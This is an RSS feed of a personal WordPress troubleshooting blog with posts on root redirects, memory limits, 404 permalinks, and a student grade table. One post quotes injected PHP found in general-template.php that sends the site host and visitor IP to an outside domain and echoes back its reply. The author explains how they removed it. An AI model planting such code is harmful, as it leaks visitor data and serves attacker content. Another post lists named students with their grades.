<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>How to Build Site from a Blog</title>
	<atom:link href="http://www.madhuriesingh.com/howtobuildsite/index.php/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.madhuriesingh.com/howtobuildsite</link>
	<description></description>
	<lastBuildDate>Wed, 31 Aug 2011 12:54:14 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		
<!-- Start Of Script Generated By WP-PostViews Plus -->
<script type='text/javascript' src='http://www.madhuriesingh.com/howtobuildsite/wp-includes/js/jquery/jquery.js?ver=1.3.2'></script>
<script type="text/javascript">
/* <![CDATA[ */
/* ]]> */
</script>
<!-- End Of Script Generated By WP-PostViews Plus -->
	<item>
		<title>Changing from one blog directory to another to make homepage in wordpress root</title>
		<link>http://www.madhuriesingh.com/howtobuildsite/index.php/2011/changing-from-one-blog-directory-to-another-to-make-homepage-in-wordpress-root/</link>
		<comments>http://www.madhuriesingh.com/howtobuildsite/index.php/2011/changing-from-one-blog-directory-to-another-to-make-homepage-in-wordpress-root/#comments</comments>
		<pubDate>Wed, 31 Aug 2011 10:41:22 +0000</pubDate>
		<dc:creator>Madhurie Singh</dc:creator>
				<category><![CDATA[Webpage Design]]></category>

		<guid isPermaLink="false">http://www.madhuriesingh.com/howtobuildsite/?p=560</guid>
		<description><![CDATA[

			
				
			
		
<p>Its been years since I have written anything on this blog.
But the whole purpose of creating this blog was like a reference tool for me whenever I needed.
So here I am once again reading older posts and boy am I glad I wrote these posts.</p>
<p>Ok now I have more than 10 blogs in my domain. [...]]]></description>
			<content:encoded><![CDATA[
<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2011%2Fchanging-from-one-blog-directory-to-another-to-make-homepage-in-wordpress-root%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2011%2Fchanging-from-one-blog-directory-to-another-to-make-homepage-in-wordpress-root%2F&amp;style=normal&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>Its been years since I have written anything on this blog.<br />
But the whole purpose of creating this blog was like a reference tool for me whenever I needed.<br />
So here I am once again reading older posts and boy am I glad I wrote these posts.</p>
<p>Ok now I have more than 10 blogs in my domain. </p>
<p>But I realised one mistake that most new comers do.</p>
<p>As simple scripts used to create  the wordpress in subdirectory and not root, the SEO sucks!<br />
Google hates it.<br />
The robots crawl to the domain but hate to crawl to the subdirectories, those lazy bums!!!</p>
<p>So how to get the SEO fixed!</p>
<p>I must not make sure the most popular blog that is superindiankid must become my home page blog.</p>
<p>So when ever the robots read madhuriesingh.com they are redicted automatically to madhuriesingh.com/superindiankid.<br />
Then shift all or those that are not very popular yet on to this same superindiankid blog.</p>
<p>The idea is to keep the robot in the same blog but provide all information in one blog to get the SEO benefit.</p>
<p>So first I will read everything again about shifting the blogs from subdirectory to root.<br />
Make a copy of index.php and .access files of both the superindiankid blog and root public directory as a backup.</p>
<p>1. Now goto wordpress admin.<br />
2. Go to settings<br />
3. Go to General<br />
4. Make sure the wordpress blog address and  url are both same as in  madhuriesingh.com/superindiankid<br />
5. Now make sure index.php on superindiankid directory is having same content as below.</p>
<p>Index.php on www.madhuriesingh.com/superindiankid wordpress directory.</p>
<p>< ?php<br />
/**<br />
 * Front to the WordPress application. This file doesn't do anything, but loads<br />
 * wp-blog-header.php which does and tells WordPress to load the theme.<br />
 *<br />
 * @package WordPress<br />
 */</p>
<p>Now goto the redirect link on the Cpanel.<br />
Add new redirects </p>
<p>Permanent 301 redirects<br />
http://www    madhuriesingh.com    /   superindiankid</p>
<p>redirects to -> http://www.madhuriesingh.com</p>
<p>/**<br />
 * Tells WordPress to load the WordPress theme and output it.<br />
 *<br />
 * @var bool<br />
 */<br />
define(&#8217;WP_USE_THEMES&#8217;, true);</p>
<p>/** Loads the WordPress Environment and Template */<br />
require(&#8217;./wp-blog-header.php&#8217;);<br />
?></p>

]]></content:encoded>
			<wfw:commentRss>http://www.madhuriesingh.com/howtobuildsite/index.php/2011/changing-from-one-blog-directory-to-another-to-make-homepage-in-wordpress-root/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 368640 bytes)    in /mnt/110/sdb/1/d/jef/        wordpress/wp-includes/    on line</title>
		<link>http://www.madhuriesingh.com/howtobuildsite/index.php/2010/fatal-error-allowed-memory-size-of-33554432-bytes-exhausted-tried-to-allocate-368640-bytes-in-mnt110sdb1djef-wordpresswp-includes-on-line/</link>
		<comments>http://www.madhuriesingh.com/howtobuildsite/index.php/2010/fatal-error-allowed-memory-size-of-33554432-bytes-exhausted-tried-to-allocate-368640-bytes-in-mnt110sdb1djef-wordpresswp-includes-on-line/#comments</comments>
		<pubDate>Sun, 02 May 2010 08:31:47 +0000</pubDate>
		<dc:creator>Madhurie Singh</dc:creator>
				<category><![CDATA[Webpage Design]]></category>

		<guid isPermaLink="false">http://www.madhuriesingh.com/howtobuildsite/?p=555</guid>
		<description><![CDATA[

			
				
			
		
<p>This error looks bad, but most simple to handle:)</p>
<p>Goto the directory of your blog in Cpanel.</p>
<p>Click wp_settings</p>
<p>open in an editor.</p>
<p>search for wp_memory.</p>
<p>goto</p>
<p>define (&#8217;wp_memory_limit&#8217;, &#8216;32M&#8217;);</p>
<p> and change 32 to 64.
define(&#8217;WP_MEMORY_LIMIT&#8217;, &#8216;64M&#8217;);</p>
<p>save the file and DONE  </p>

]]></description>
			<content:encoded><![CDATA[
<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2010%2Ffatal-error-allowed-memory-size-of-33554432-bytes-exhausted-tried-to-allocate-368640-bytes-in-mnt110sdb1djef-wordpresswp-includes-on-line%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2010%2Ffatal-error-allowed-memory-size-of-33554432-bytes-exhausted-tried-to-allocate-368640-bytes-in-mnt110sdb1djef-wordpresswp-includes-on-line%2F&amp;style=normal&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>This error looks bad, but most simple to handle:)</p>
<p>Goto the directory of your blog in Cpanel.</p>
<p>Click wp_settings</p>
<p>open in an editor.</p>
<p>search for wp_memory.</p>
<p>goto</p>
<p>define (&#8217;wp_memory_limit&#8217;, &#8216;32M&#8217;);</p>
<p> and change 32 to 64.<br />
define(&#8217;WP_MEMORY_LIMIT&#8217;, &#8216;64M&#8217;);</p>
<p>save the file and DONE <img src='http://www.madhuriesingh.com/howtobuildsite/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>

]]></content:encoded>
			<wfw:commentRss>http://www.madhuriesingh.com/howtobuildsite/index.php/2010/fatal-error-allowed-memory-size-of-33554432-bytes-exhausted-tried-to-allocate-368640-bytes-in-mnt110sdb1djef-wordpresswp-includes-on-line/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to solve warning : file_get_contents (http://24365 online.com/ _YTG_yu/ _dl/ get_info.php?</title>
		<link>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/warning-file_get_contentshttp24365online-com_ytg_yu_dlget_info-php-solved/</link>
		<comments>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/warning-file_get_contentshttp24365online-com_ytg_yu_dlget_info-php-solved/#comments</comments>
		<pubDate>Mon, 02 Nov 2009 18:07:41 +0000</pubDate>
		<dc:creator>Madhurie Singh</dc:creator>
				<category><![CDATA[Error in Wordpress]]></category>

		<guid isPermaLink="false">http://www.madhuriesingh.com/howtobuildsite/?p=544</guid>
		<description><![CDATA[

			
				
			
		
<p>I found this strange error message right at the bottom of my posts in the evening, out of the blue !!!</p>
<p>I wondered what did I do new that caused it but other than adding a small code I did not do anything. </p>
<p>The error message was </p>
<p>Warning: file_get_contents(http://24365online.com/_YTG_yu/_dl/get_info.php?host=www.madhuriesingh.com&#038;referer=&#038;visitor_ip=122.170.41.0) [function.file-get-contents]: failed to open stream: HTTP request [...]]]></description>
			<content:encoded><![CDATA[
<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2009%2Fwarning-file_get_contentshttp24365online-com_ytg_yu_dlget_info-php-solved%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2009%2Fwarning-file_get_contentshttp24365online-com_ytg_yu_dlget_info-php-solved%2F&amp;style=normal&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>I found this strange error message right at the bottom of my posts in the evening, out of the blue !!!</p>
<p>I wondered what did I do new that caused it but other than adding a small code I did not do anything. </p>
<p>The error message was </p>
<p><strong>Warning: file_get_contents(http://24365online.com/_YTG_yu/_dl/get_info.php?host=www.madhuriesingh.com&#038;referer=&#038;visitor_ip=122.170.41.0) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 500 Internal Server Error in /home8/madhurie/public_html/superindiankid/wp-includes/general-template.php on line 61</strong></p>
<p>I opened a ticket asap, as I did not wish to waste time in self analysis as I had live data and live members on my site. </p>
<p>The help was a mail which was this<br />
<em>500 errors can be caused by several things.</p>
<p>1. Make sure all your files and folders have permissions of 755 or lower. Anything higher then 755 will cause a 500 error.</p>
<p>2. Any miscoded or conflicting entries in the .htaccess file will throw a 500 error as well. you can test to see if this is the issue by renaming that file to .htaccess.old and then reloading the page you were getting that error on.</p>
<p>3. Too many running php or fastcgi processes. You can view the processes you are running by clicking on the process manager under the advanced heading of your cPanel.</p>
<p>If you do all of these things and are still getting a 500 error please let me know.</em></p>
<p>One look at the email and I knew I will have to do this error handling myself. So I went to the line 61 on my general-template.php file in wp_content directory. </p>
<p>I saw this strange looking url which I do not remember ever adding or using !</p>
<p>SO I gave a search on the google about this url </p>
<p>$url = &#8220;http://24365online.com/_YTG_yu/_dl/get_info.php?host=$host&#038;referer=$referervisitor_ip=$visitor_ip&#8221;; $content = file_get_contents($url);</p>
<p>I found a beautiful link to wordpress support http://wordpress.org/support/topic/305487 where it was very clear that this silly url was passing onto about my site members to a database link !!!!</p>
<p>So I went back to the general-template.php in wp_content directory, and commented the line 61-64 by placing them under /*  &#8230;.*/<br />
or<br />
/*$content = file_get_contents($url);<br />
				echo  $content;*/</p>
<p>And there that was that !<br />
My site was clean and no error message shown!!!</p>
<p>Thanks a ton to the people who take time to write these error messages on the forum with solution. It makes me feel I am not alone !:)</p>

]]></content:encoded>
			<wfw:commentRss>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/warning-file_get_contentshttp24365online-com_ytg_yu_dlget_info-php-solved/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>404 Broken Link Error page &#8211; File not found- permalinks</title>
		<link>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/404-broken-link-error-page-file-not-found-permalinks/</link>
		<comments>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/404-broken-link-error-page-file-not-found-permalinks/#comments</comments>
		<pubDate>Wed, 28 Oct 2009 13:04:07 +0000</pubDate>
		<dc:creator>Madhurie Singh</dc:creator>
				<category><![CDATA[Error in Wordpress]]></category>

		<guid isPermaLink="false">http://www.madhuriesingh.com/howtobuildsite/?p=436</guid>
		<description><![CDATA[

			
				
			
		
<p>Today I was feeling great   and saw 472000 search result of my name madhurie singh!</p>
<p>But the happiness did not last long   when I found some of the links to my site were giving error : OOPS ! The Links is broken.
The page it takes the browser to is the dreaded 404 [...]]]></description>
			<content:encoded><![CDATA[
<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2009%2F404-broken-link-error-page-file-not-found-permalinks%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2009%2F404-broken-link-error-page-file-not-found-permalinks%2F&amp;style=normal&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>Today I was feeling great <img src='http://www.madhuriesingh.com/howtobuildsite/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  and saw 472000 search result of my name madhurie singh!</p>
<p>But the happiness did not last long <img src='http://www.madhuriesingh.com/howtobuildsite/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />  when I found some of the links to my site were giving error : OOPS ! The Links is broken.<br />
The page it takes the browser to is the dreaded 404 File Not Found!!!!</p>
<p>And the funny part is the link that takes me there was a page that I had never created i.e. www.madhuriesingh.com/tag/holiday !!!</p>
<p>Now I am wondering how on earth did this happen. What does this error mean?</p>
<p>Hmm this site explains it <a href="http://www.bloghighlight.com/broken-links-sinking-search-engine-rankings/">http://www.bloghighlight.com/broken-links-sinking-search-engine-rankings/</a> best.</p>
<p><a href="http://www.bloghighlight.com/7-top-wordpress-seo-plugin-to-boost-blog-traffic/">http://www.bloghighlight.com/7-top-wordpress-seo-plugin-to-boost-blog-traffic/</a></p>
<p>SO I gave a search on 404 error tag link broken:</p>
<p>I see a great number of sites on the same error handling, so lemme start browsing and scanning for the best site:</p>
<p>The first site is http://codex.wordpress.org/Creating_an_Error_404_Page.<br />
http://wordpress.org/support/topic/273787</p>
<p><a href="http://perishablepress.com/press/2008/12/31/redirect-all-broken-links-from-any-domain-via-htaccess/">http://perishablepress.com/press/2008/12/31/redirect-all-broken-links-from-any-domain-via-htaccess/</a><br />
http://codex.wordpress.org/Glossary<br />
http://codex.wordpress.org/Using_Permalinks#Using_.22Pretty.22_permalinks<br />
http://codex.wordpress.org/Using_Permalinks#PATHINFO:_.22Almost_Pretty.22</p>
<p><a href="http://www.lunarforums.com/lunarpages_webhosting_help/problem_with_wordpress_404-t47372.0.html">http://www.lunarforums.com/lunarpages_webhosting_help/problem_with_wordpress_404-t47372.0.html</a></p>
<p>This site claims to resolver all 404 error s by uploading a php file classes.php and functions-post.php</p>
<p><a href="http://wordpress.org/support/topic/54340">http://wordpress.org/support/topic/54340</a> <img src='http://www.madhuriesingh.com/howtobuildsite/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Ok after reading here and there, one important thing that I have found is that I need a <strong>mod_rewrite installed and working and the server able to read the htaccess file</strong>.</p>
<p>I checked my .htaccess file which is in the root directory. I use File Manager in Cpanel to view it even though its a hidden file.<br />
Legacy File Manager does not show hidden files.</p>
<p>My .htaccess file is blank <img src='http://www.madhuriesingh.com/howtobuildsite/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />   even though I have done changes in permalinks of all my blogs.<br />
It just has this in it<br />
# BEGIN WordPress</p>
<p># END WordPress</p>
<p>So obviously I need to make sure it has at least the mod_rewrite function to make the necessary changes that I have set through the wordpress admin page to all my blogs!</p>
<p>Let me find out the reason for the .htaccess file not being written !</p>
<p>1. One common reason is that the file is not accessible by the wordpress admin page to make the changes in .htaccess file for desired permalinks.<br />
So I will have to change the permissions to allow the wordpress to write the .htaccess file. So I change its permission to 666 not 777.</p>
<p>Now I changed the permalinks from /%year%/%month%/%date%/%post%/  to  /%index%</p>
<p>This is a great site for explaining the permalinks and how to solve errors because of permalinks:<br />
http://www.articlesbase.com/communication-articles/when-wordpress-permalinks-404-42939.html.</p>
<p><em><span style="font-style:normal;">If nothing works I will check this site later <a href="http://www.lunarforums.com/lunarpages_webhosting_help/problem_with_wordpress_404-t47372.0.html">http://www.lunarforums.com/lunarpages_webhosting_help/problem_with_wordpress_404-t47372.0.html</a></span></em></p>
<p>One thing no one will tell ! Never get the site up with test posts unless very sure. Else the bots will index these test files and save them in some server of google or any other engine. And then when that link pops up in the search it will give 404 error, as the file obviously does not exist !</p>
<p>So in case I need to test any page or post, I make sure I preview it several times and keep it live for a few minutes only.</p>

]]></content:encoded>
			<wfw:commentRss>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/404-broken-link-error-page-file-not-found-permalinks/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Grades for MILE Managers</title>
		<link>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/grades-for-mile-managers/</link>
		<comments>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/grades-for-mile-managers/#comments</comments>
		<pubDate>Mon, 26 Oct 2009 08:39:19 +0000</pubDate>
		<dc:creator>Madhurie Singh</dc:creator>
				<category><![CDATA[IT for Managers]]></category>

		<guid isPermaLink="false">http://www.madhuriesingh.com/howtobuildsite/?p=535</guid>
		<description><![CDATA[

			
				
			
		
MILE Internal Grades



	
		FIRST NAMELAST  NAMEGRADES - Need for MBAGrade - Word/ Cover Letter/ Discussions/ Interest/ PerformanceGrade -Time Management

Goals / Mission/ KRA/ Tools for Time Mgt
	


	
		AshishSahuE
	
	
		SandeeshSasiC
	
	
		TejpalChaniD
	
	
		KaranKakadeB
	
	
		JatinVohraB
	
	
		KarthikGodaD
	
	
		AldousJosephD
	
	
		AnkurKhungerB
	
	
		Darshan LokhandeC
	
	
		Yogesh DewalkarB
	
	
		SameerOberoiB
	
	
		UllasDewanganB
	
	
		TruptiPatwardhanB
	
	
		SaranyaIyerA
	
	
		PiyushWandhareB
	
	
		AmitSinghB
	
	
		NirmalPatilA
	
	
		HemantPawarB
	
	
		VarunRawalC
	
	
		Prashant MahagaonkarC
	
	
		VishalThakkarA
	
	
		KetkiVanmaliB
	
	
		
	
	
		
	
	
		
	
	
		
	
	
		
	
	
		
	
	
		
	


Grade for MILE Managers based on  Internal Observations, Discussions, Interactions and Performance.

In case there is any confusion, use comment section to clarify. 

Kindly do not email [...]]]></description>
			<content:encoded><![CDATA[
<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2009%2Fgrades-for-mile-managers%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2009%2Fgrades-for-mile-managers%2F&amp;style=normal&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<h2 class="wp-table-reloaded-table-name-id-1 wp-table-reloaded-table-name">MILE Internal Grades</h2>

<table id="wp-table-reloaded-id-1-no-1" class="wp-table-reloaded wp-table-reloaded-id-1">
<thead>
	<tr class="row-1 odd">
		<th class="column-1">FIRST NAME</th><th class="column-2"></th><th class="column-3">LAST  NAME</th><th class="column-4">GRADES - Need for MBA</th><th class="column-5">Grade - Word/ Cover Letter/ Discussions/ Interest/ Performance</th><th class="column-6">Grade -Time Management<br />
<br />
Goals / Mission/ KRA/ Tools for Time Mgt</th><th class="column-7"></th><th class="column-8"></th><th class="column-9"></th><th class="column-10"></th><th class="column-11"></th>
	</tr>
</thead>
<tbody>
	<tr class="row-2 even">
		<td class="column-1">Ashish</td><td class="column-2"></td><td class="column-3">Sahu</td><td class="column-4"></td><td class="column-5">E</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-3 odd">
		<td class="column-1">Sandeesh</td><td class="column-2"></td><td class="column-3">Sasi</td><td class="column-4"></td><td class="column-5">C</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-4 even">
		<td class="column-1">Tejpal</td><td class="column-2"></td><td class="column-3">Chani</td><td class="column-4"></td><td class="column-5">D</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-5 odd">
		<td class="column-1">Karan</td><td class="column-2"></td><td class="column-3">Kakade</td><td class="column-4"></td><td class="column-5">B</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-6 even">
		<td class="column-1">Jatin</td><td class="column-2"></td><td class="column-3">Vohra</td><td class="column-4"></td><td class="column-5">B</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-7 odd">
		<td class="column-1">Karthik</td><td class="column-2"></td><td class="column-3">Goda</td><td class="column-4"></td><td class="column-5">D</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-8 even">
		<td class="column-1">Aldous</td><td class="column-2"></td><td class="column-3">Joseph</td><td class="column-4"></td><td class="column-5">D</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-9 odd">
		<td class="column-1">Ankur</td><td class="column-2"></td><td class="column-3">Khunger</td><td class="column-4"></td><td class="column-5">B</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-10 even">
		<td class="column-1">Darshan </td><td class="column-2"></td><td class="column-3">Lokhande</td><td class="column-4"></td><td class="column-5">C</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-11 odd">
		<td class="column-1">Yogesh </td><td class="column-2"></td><td class="column-3">Dewalkar</td><td class="column-4"></td><td class="column-5">B</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-12 even">
		<td class="column-1">Sameer</td><td class="column-2"></td><td class="column-3">Oberoi</td><td class="column-4"></td><td class="column-5">B</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-13 odd">
		<td class="column-1">Ullas</td><td class="column-2"></td><td class="column-3">Dewangan</td><td class="column-4"></td><td class="column-5">B</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-14 even">
		<td class="column-1">Trupti</td><td class="column-2"></td><td class="column-3">Patwardhan</td><td class="column-4"></td><td class="column-5">B</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-15 odd">
		<td class="column-1">Saranya</td><td class="column-2"></td><td class="column-3">Iyer</td><td class="column-4"></td><td class="column-5">A</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-16 even">
		<td class="column-1">Piyush</td><td class="column-2"></td><td class="column-3">Wandhare</td><td class="column-4"></td><td class="column-5">B</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-17 odd">
		<td class="column-1">Amit</td><td class="column-2"></td><td class="column-3">Singh</td><td class="column-4"></td><td class="column-5">B</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-18 even">
		<td class="column-1">Nirmal</td><td class="column-2"></td><td class="column-3">Patil</td><td class="column-4"></td><td class="column-5">A</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-19 odd">
		<td class="column-1">Hemant</td><td class="column-2"></td><td class="column-3">Pawar</td><td class="column-4"></td><td class="column-5">B</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-20 even">
		<td class="column-1">Varun</td><td class="column-2"></td><td class="column-3">Rawal</td><td class="column-4"></td><td class="column-5">C</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-21 odd">
		<td class="column-1">Prashant </td><td class="column-2"></td><td class="column-3">Mahagaonkar</td><td class="column-4"></td><td class="column-5">C</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-22 even">
		<td class="column-1">Vishal</td><td class="column-2"></td><td class="column-3">Thakkar</td><td class="column-4"></td><td class="column-5">A</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-23 odd">
		<td class="column-1">Ketki</td><td class="column-2"></td><td class="column-3">Vanmali</td><td class="column-4"></td><td class="column-5">B</td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-24 even">
		<td class="column-1"></td><td class="column-2"></td><td class="column-3"></td><td class="column-4"></td><td class="column-5"></td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-25 odd">
		<td class="column-1"></td><td class="column-2"></td><td class="column-3"></td><td class="column-4"></td><td class="column-5"></td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-26 even">
		<td class="column-1"></td><td class="column-2"></td><td class="column-3"></td><td class="column-4"></td><td class="column-5"></td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-27 odd">
		<td class="column-1"></td><td class="column-2"></td><td class="column-3"></td><td class="column-4"></td><td class="column-5"></td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-28 even">
		<td class="column-1"></td><td class="column-2"></td><td class="column-3"></td><td class="column-4"></td><td class="column-5"></td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-29 odd">
		<td class="column-1"></td><td class="column-2"></td><td class="column-3"></td><td class="column-4"></td><td class="column-5"></td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
	<tr class="row-30 even">
		<td class="column-1"></td><td class="column-2"></td><td class="column-3"></td><td class="column-4"></td><td class="column-5"></td><td class="column-6"></td><td class="column-7"></td><td class="column-8"></td><td class="column-9"></td><td class="column-10"></td><td class="column-11"></td>
	</tr>
</tbody>
</table>
<span class="wp-table-reloaded-table-description-id-1 wp-table-reloaded-table-description">Grade for MILE Managers based on  Internal Observations, Discussions, Interactions and Performance.<br />
<br />
In case there is any confusion, use comment section to clarify. <br />
<br />
Kindly do not email me or call me for any clarifications regarding grades.<br />
<br />
Let us not waste each other's time :), for I believe in being FAIR always.<br />
<br />
A - Excellent          B - Good   C - OK                    D - :(          E - %-(          F - !-(                                                            G-Z -  HELP ME !</span>


]]></content:encoded>
			<wfw:commentRss>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/grades-for-mile-managers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Importance of MBA for Managers Today &#8211; Batch N-Z</title>
		<link>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/importance-of-mba-for-managers-today-batch-n-z/</link>
		<comments>http://www.madhuriesingh.com/howtobuildsite/index.php/2009/importance-of-mba-for-managers-today-batch-n-z/#comments</comments>
		<pubDate>Sat, 24 Oct 2009 14:15:26 +0000</pubDate>
		<dc:creator>Madhurie Singh</dc:creator>
				<category><![CDATA[IT for Managers]]></category>

		<guid isPermaLink="false">http://www.madhuriesingh.com/howtobuildsite/?p=522</guid>
		<description><![CDATA[

			
				
			
		
<p>Welcome to the first topic. </p>
<p>Please use the comment section to write your views.
Do not forget to mention you blog address.
Update your blog too.</p>
<p>Thanks</p>
<p>Professor Madhurie Singh</p>

]]></description>
			<content:encoded><![CDATA[
<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.madhuriesingh.com%2Fhowtobuildsite%2Findex.php%2F2009%2Fimportance-of-mba-for-managers-today-batch-n-z%2F"><br />
